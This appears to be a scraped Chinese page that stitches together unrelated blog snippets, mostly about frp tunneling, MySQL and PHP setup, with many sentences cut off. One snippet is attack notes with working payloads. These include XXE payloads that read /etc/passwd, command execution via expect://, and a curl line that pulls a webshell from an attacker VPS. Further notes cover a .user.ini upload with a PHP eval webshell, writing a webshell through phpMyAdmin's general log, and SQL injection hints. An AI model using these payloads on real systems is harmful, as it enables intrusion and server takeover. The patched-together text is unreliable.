下载Linux(centos7)版本的frp_0.21.0,所有版本frp点这里
FinalShell SSH工具: http://www.hostbuf.com/t/988.html 必备条件:java配置好,它依赖于java环境
最近一个项目需要用到将订单发布到第三方平台,之后要是有人购买他们会请求我们这边的接口来改变订单状态等!
平常的ini配置文件只能读取,但是这个库不光可以读取、写入配置项,还能给配置项写注释。只有一个hpp头文件,不需要编译,支持C++11及之后版本。
从https://github.com/fatedier/frp/releases 下载最新版本的frp压缩包。因为是两种系统,所以把linux和windows的版本都下载了一份。
在Msql注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件
通过 getconf LONG_BIT Linux查看系统位数命令:返回的结果如果是64,说明linux系统属于64位;返回32,系统属于32位。
各大 Linux 发行版的 MySQL 逃亡潮越演越烈,继 Mageia 2(原 Mandriva 社区衍生版)和 OpenSUSE 12.3 以后,Fedora 社区宣布将会在即将发布跳票的 Fedora 19 使用 MariaDB 替代 MySQL。MariaDB 是原 MySQL 创始人 Michael 'Monty' Widenius创建的一个 MySQL 社区分支,为避免 MySQL 落入 Oracle 收后存在的闭源风险,同时提供更多特性及更强的性能。 MariaDB 最新稳定版本为 5.5.2
在运营网站的过程中,可能会遇到网站突然变慢的问题,一般情况下和 MySQL 慢有关系,可以通过开启慢查询,找到影响效率的 SQL ,然后采取相应的措施。下面介绍一下如何开启慢查询:
本来是不写这个了,因为宝塔我也搭建了青龙面板,理论上是不需要再去穿透我本地手机青龙了。但因为我有开着京东车(http://wjsyyx.top/jdck),为了避免用服务器IP把大家号给黑了,所以还是保留了本地手机青龙,因此也就需要再配置内网穿透了。
在Linux中rm -rf的威力是十分巨大的,特别是附带了 -f 参数,不少新手都干过用root用户执行 rm -rf /命令这种傻事,如果云服务器没有快照,简直就是灾难,从根目录开始所有文件被递归删除,连系统都被损坏。
有一次魏艾斯博客遇到了 WordPress 后台只显示一个主题,不显示也无法切换到其它主题的问题,打开 WordPress 后台-外观,无法编辑当前主题。后来经过查找和分析原因,是因为权限问题,具体描
通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括:
1、将PHP文件夹下的三个文件php_curl.dll,libeay32.dll,ssleay32.dll复制到system32下;
在之前的一篇文章《终端自动化测试探索之路》中提到过当发生断电等情况,服务器重启之后如何快速恢复自动化服务,这里针对这个问题具体讲讲我的实现方式。
FRP服务可以分配给你一个域名让你本地的web项目提供给外网访问,特别适合向别人展示你本机的web demo以及调试一些远程的API(用作微信公众号,企业号的开发)
首发drops:http://drops.wooyun.org/tips/3978 。
文章目录 导读 实验 C语言Linux编程实现 导读 有时候我们在Linux下删除某个文件夹内的所有文件时需要排除一些文件。 例如如下真是用户案例: 用户在嵌入式设备中恢复默认设置的时候,不让某些比较配置繁琐的配置恢复(即保留某些文件); 实验 例如我们有test/a.txt b.txt c.txt d.txt e.txt 和 test/config/setting.ini这些配置文件,都有不同的作用。 假设我们需要保留test/c.txt和test/config/setting.ini这两个配置
Anki自带的AnkiWeb同步服务体验较差,当你的单词库较大时,同步起来体验非常的差。因此我在腾讯云上自己搭建了Anki同步服务器。
python web服务器开发使用WSGI协议(Web Server Gateway Interface)
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。frp的好处是利用内网或防火墙后的机器,对外网环境提供http或https服务。对于http和https服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。利用处于内网或防火墙后的机器,对外网环境提供tcp和udp服务,例如在家里通过ssh或者web访问公司内网环境内的主机或者业务进行办公。frp采用Golang编写,支持跨平台,除了二进制文件,没有额外依赖
这次我们来学习的是一些不是太常用,但却也非常有用的一些函数。它们中有些大家可能见过或者使用过,有一些可能就真的没什么印象了。它们都是 PHP 中文件系统相关操作函数的一部分。存在即合理,或许只是我们的业务开发中还没有接触到而已。不管别的,先混个脸熟,在真正需要它们的时候你能马上想起来 PHP 就自带一个这样的函数就可以了。
1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行,做一个简单改造即可使用。对比如下: 改造前: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径:SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后,再加上回显位置即可成功利用,完整载荷示例: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种,通过上传webshell来。 利用前提:知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上,直接寄。 1)使用python托管webshell python -m http.server 8088 2)下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析: curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代,没啥好说的,常规思路。 下载url不能带协议 下载url用单引号包裹,如果是-o方式,保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多,.user.ini是php给用户的自定义配置文件,可将指定文件按照php脚本文件的形式解析。 介绍:https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程: 1)上传.user.ini filename:.user.ini Content-type:image/jpeg 文件正文: GIF89a auto_prepend_file = aaa.jpg 2)上传webshell filename: aaa.jpg Content-type:image/jpeg 文件正文: GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包: 文件——导出分组解析结果——为纯文本 通过notepad++解码: 提取所有注入数据包,此处使用notepad++中的标记功能,查找模式设置为正则表达式。 提取出来以后,找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后,用英文的逗号隔开,然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提:知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目
frp frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议
frp[1] 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
②.匹配字段 and 1=1 union select 1,2,3,4,5…….n/*
目前个人认为配置和使用上是最方便的内网穿透工具,已经用了快两年了,拿来穿透进没有公网的位于学校宿舍的路由器,蹭蹭百度文库企业账号和知网之类的23333
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
frp 是一个高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务,支持 tcp, http, https 等协议类型,并且 web 服务支持根据域名进行路由转发。
(2)内网服务器1台(我这里演示的是linux环境,win10上面vmware安装的centos7)
内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用;
ConfigParser:配置文件的读取 原文链接和公众号 文章链接: http://note.youdao.com/noteshare?id=dfec323b2c6509d7189453ec730b
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
171819APP(www.171819.top)内网穿透工具有很多,其中 Frp (Fast Reverse Proxy) 是比较流行的一款。FRP 是一个免费开源的用于内网穿透的反向代理应用,它支持 TCP、UDP 协议, 也为 http 和 https 协议提供了额外的支持。你可以粗略理解它是一个中转站,帮你实现 公网 ←→ FRP(服务器) ←→ 家庭内网 的连接,让内网里的设备也可以被公网访问到。
zabbix线上已经应用半年多了,关于zabbix在生产环境中的使用心得,以及一些经验写下来,希望让大家少走弯路,共同学习!
Yaconf是鸟哥写的一个高性能的配置管理扩展 为什么要开发这个配置管理扩展? 目前配置文件存在的问题? 用PHP文件做配置的, 一个config目录下可能有很多'.php'不同数据结构的配置文件,而配置文件的解析耗费了很大的性能。 因为数据格式种类比较多(数组、json、yaml),可读性差。 配置和代码在一起,有一定的安全隐患。 如mysql等配置发生改变,开发也要跟随改变。 Yaconf可以解决完美解决上面一系列的问题 今天我们大概的安装使用介绍一下 环境介绍 vagrant@ubuntu-xeni
分析shell脚本,学习方法,这个其实是在lnmp环境下再安装apache,实现lnmpa环境。
开源项目下载地址→https://github.com/fatedier/frp/releases frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。
这篇文章主要讲解了“linux如何查看已安装的php版本信息”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“linux如何查看已安装的php版本信息”吧!
frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。
幻兽帕鲁部署完成之后,如果您想要按照自己的喜好来对游戏世界进行DIY,打造个性化的,那么就需要通过配置游戏参数来完成。最近一段时间,这一步可谓是让众多玩家
你想快速搭建属于自己的共享服务器并且可以跨平台访问吗,你是否厌烦现有的FTP服务器部署复杂和用户权限设置繁琐呢?小编今天给大家介绍一款开源文件共享服务器chfs,首先搭建非常简单,就是一个文件,不需要其他任何插件,直接运行就行了;另外访问也方便,只要在同一个网络通过浏览器就能访问。
如果你在Google或者百度或者某些技术社区上面搜索 uwsgi+Flask,你会发现大量的文章,是教你如何使用 uwsgi+flask+Nginx搭建网站。如下图所示:
说明:对应frpc路径编译启动命令,如你下载的frpc文件在“dabenshi”文件夹,那么启动命令是:
搭载Lnmp环境的时候总是遇到各种各样的问题,整个人都给你搞的没脾气,由于刚接触Linux出了问题卸了又装卸了又装,太搞人了,这里专门写一篇Linux安装php的详细教程,方便自己也方便刚入坑的你们 本文假定你已经搭载了Linux环境 1.首先安装如下依赖包 yum install -y gcc gcc-c++ make zlib zlib-devel pcre pcre-devel libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel glibc glibc-devel glib2 glib2-devel bzip2 bzip2-devel ncurses ncurses-devel curl curl-devel e2fsprogs e2fsprogs-devel krb5 krb5-devel openssl openssl-devel openldap openldap-devel nss_ldap openldap-clients openldap-servers
内网穿透,即 NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。——来自百度百科。
然后重启 mysql (Linux 下在终端运行 sudo service mysql restart,Windows 下在 CMD 下先运行 net stop mysql 后运行 net start mysql)。
在Win7系统下,安装启动Linux特别的不方便,由于XP下的boot.ini配置文件不在了,要加入�一下启动选项的话, 仅仅能使用专门的工具,这或多或少给人带来不爽的感觉,,,
领取专属 10元无门槛券
手把手带您无忧上云